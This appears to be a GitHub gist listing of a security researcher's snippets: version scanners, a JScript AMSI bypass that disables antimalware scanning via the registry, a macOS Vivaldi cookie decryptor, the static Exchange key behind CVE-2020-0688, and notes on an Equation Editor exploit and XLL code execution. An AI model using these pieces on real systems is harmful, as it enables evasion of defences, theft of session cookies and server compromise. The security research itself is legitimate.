Skip to content

Instantly share code, notes, and snippets.

@rxwx
rxwx / pulseversion.py
Created August 13, 2019 09:04
Pulse Secure Version Scanner
View pulseversion.py
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python pulseversion.py <target ip/domain>"
sys.exit(1)
@rxwx
rxwx / cDefaultLaunchAttachmentPerms.md
Last active June 8, 2022 11:06
Attachment permissions in each version of Adobe Reader 11.0.10 - 11.0.x
View cDefaultLaunchAttachmentPerms.md
@rxwx
rxwx / offver.py
Created April 15, 2020 10:23
Get Office version that last saved the file
View offver.py
import re
import sys
versions = {
0x00: 'Excel 97',
0x01: 'Excel 2000',
0x02: 'Excel 2002',
0x03: 'Office Excel 2003',
0x04: 'Office Excel 2007',
0x06: 'Excel 2010',
@rxwx
rxwx / bypass.js
Created August 16, 2018 17:14
AMSIEnable Bypass in JScript
View bypass.js
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
@rxwx
rxwx / vivaldi-decrypt.py
Last active May 14, 2020 13:03
Decrypt Vivaldi Cookies on MacOS
View vivaldi-decrypt.py
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
@rxwx
rxwx / CVE-2020-0688.config
Created February 14, 2020 16:38
CVE-2020-0688
View CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
@rxwx
rxwx / notes.md
Last active February 21, 2020 06:19
Notes on new Equation Editor Exploit, CVE-2018-0802 variant
View notes.md

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

@rxwx
rxwx / ziptool.ps1
Created May 4, 2018 17:47
File Zip in native PowerShell with .NET 3.0
View ziptool.ps1
<#
.SYNOPSIS
Author: Rich Warren
Based on original c# code by Jon Galloway:
https://weblogs.asp.net/jongalloway/creating-zip-archives-in-net-without-an-external-library-like-sharpziplib
.DESCRIPTION
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
@rxwx
rxwx / get-linkedin-id.js
Created August 25, 2017 15:43
JS to grab a linkedin memberID from a profile
View get-linkedin-id.js
// paste this in the chrome console and call findMemberID() when on a profile page
// need to be logged in
function decodeHtml(html) {
var txt = document.createElement("textarea");
txt.innerHTML = html;
return txt.value;
}
function httpGet(){
@rxwx
rxwx / Readme.md
Last active January 19, 2018 21:55
View Readme.md

Notes

An XLL file is basically a DLL with some special features to make it work with Excel.

See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.